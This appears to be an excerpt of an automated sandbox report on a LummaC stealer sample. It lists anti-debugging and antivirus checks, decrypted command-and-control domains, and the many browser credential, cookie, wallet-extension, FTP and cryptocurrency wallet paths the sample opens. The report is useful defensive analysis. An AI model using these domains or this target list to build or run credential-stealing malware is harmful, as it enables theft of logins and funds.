                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
                Source: EI3TafelpV.exe, 00000000.00000002.2027097779.0000000000FA4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\EI3TafelpV.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: EI3TafelpV.exe, 00000000.00000003.1596674784.0000000001136000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1596674784.000000000111F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: EI3TafelpV.exe PID: 7524, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: EI3TafelpV.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: EI3TafelpV.exeString found in binary or memory: Wallets/Exodus
                Source: EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: EI3TafelpV.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: EI3TafelpV.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
